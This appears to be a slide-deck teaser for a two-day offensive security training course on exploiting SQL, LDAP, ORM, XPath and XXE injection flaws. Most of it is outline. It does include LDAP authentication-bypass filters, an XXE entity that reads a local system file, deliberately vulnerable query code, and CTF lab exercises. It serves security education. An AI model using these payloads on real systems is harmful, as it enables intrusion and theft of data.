This document provides information about a 2-day training course on exploiting injection flaws. It discusses the agenda which includes hands-on exercises covering SQL injection, LDAP injection, ORM injection, XPath injection and combining XXE and XPath. The trainer, Sumit Siddharth, is an expert in application and database security with over 8 years experience who has spoken at several security conferences. The course aims to help attendees think outside the box to find issues that tools may miss through practical CTF exercises.
UiPath Community: Communication Mining from Zero to Hero
Injection flaw teaser
1. The Art Of Exploiting
Injection Flaws
Sumit Siddharth
sid@notsosecure.com
2. About the course
Hands on 2 days training
Require out of box thinking (strong coffee
recommended!)
20 exercises, 100 slides, 8 CTFs!
Previous feedback:
“ This was the best course I have ever been on. Since attending
the course, I have identified so many issues which automated
tools have missed. Thanks a ton, Sid”
“I have been pentesting for 4 years now, and thought I knew all
about SQLI. I guess I was wrong. If anyone knows this subject
well, it is Sid”
3. About Me
Sumit “sid” Siddharth
Speaker/Trainer at Black Hat, Def con,
OWASP Appsec, HITB, Ruxcon etc
My blog: www.notsosecure.com
Specialist in Application & Database Security!
More than 8 years of Pentesting!
Co-author: SQL Injection, attacks and defense
Head of Penetration testing@7Safe
5. Exploiting SQL Injections
Authentication Bypass
Extracting Data
Error Message Enabled
Error Message Disabled
Union Injection
Blind Injection
Time Delays
Out Of Band Channels
Privilege Escalation
OS code execution
6. Exercise 9.8 – SQL Injection: OS command
execution
http://hacklab.net/hackme_7.5/
Objective
Exploit SQL injection to run OS commands on the database
server
CTF : What are the contents of C:secret.txt on the server
Time
10 mins
7. Advanced SQL Injection
Insanely Blind SQL Injection
Application returns same response
Injection point in INSERT/UPDATE statement
8. Encoding/Decoding User Input
Base64 decoding user input
Hex decoding user input
Real world examples
WordPress Admin-Ajax.php unauthenticated SQL injection
PHP-Nuke auth.php
$cookie=explode(„;‟, urldecode(empty($_POST[„cookie‟])))
$admin=base64_decode($admin)
9. SQL Injection in SQL Names
Consider the following:
Dim cat, orderBy, query
cat = Replace(Request.Form(“cat”), “‟”, “‟‟”)
orderBy = Replace(Request.Form(“orderBy”), “‟”, “‟‟”)
query = “SELECT * FROM prod WHERE cat = „” & cat &
“‟ ORDER BY “ & orderBy
10. Hacking Oracle from Web
Exploiting SQL Injection against oracle database
How to extract data
One Query to get them all!
How to execute OS code
What if we are not DBA
Become DBA
Execute OS code
Drop DBA
11. Capture The Flag: SQL Injection
http://hacklab.net/ctf.asp?data=foobar
Objective
• What’s in C:secret.txt
Time
20 Mins!
No instructions or hints this time!
12. Day 2: The Art of Exploiting
Lesser Known Injection Flaws
ORM Injection
LDAP Injection
Advanced LDAP Injection
XPath Injection
Xpath v2
XML Entity Injection
Combining Xpath and XXE
CTF
Q&A
13. Hibernate Query Language Injection
User’s input to be passed directly to the
underlying SQL engine
List<Event> result = session.createQuery(
"from Event e where e.title='" + param +
"'").list();
14. HACKING LDAP
LDAP overview
LDAP injection
Blind LDAP injection
Hacking LDAP in practice
Securing Applications Against LDAP
Injections
15. LDAP Injection: Authentication Bypass
(&(user=username)(password=pwd))
Usually password is hashed and then matched with the
stored value
Injection is most likely to work only in username field
(&(user=username)(password=*))
(&(user=username)(&))(password=pwd))
Anything after first filter will be
ignored by OpenLDAP
20. Hugely increased feature set
Regular expressions
Unicode normalization
String to code point conversion
Remote document references
All of these can be utilised to speed up document
retrieval and reduce the key space we have to search.
XPath 2.0 Features..
21. XPATH 2.0
Allows to not just read the current XML file but any
arbitrary xml file on the file system.
22. Hacking Web Services with XML External Entity
Not validating the xml files before processing it
Attacker can inject an external entity
<!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
Web service parse the entity and the parser
access the local resource
Unauthorized access to information
Post scanning
Denial of service attack
Breaking the xml syntax
Providing files like /dev/urandom
23. Combining XXE and Xpath
Did I say, with Xpath 2.0 you can read arbitrary xml
files on the file system.
I actually mean:
with Xpath 2.0 you can read arbitrary xml files on the file
system.
Introducing Xcat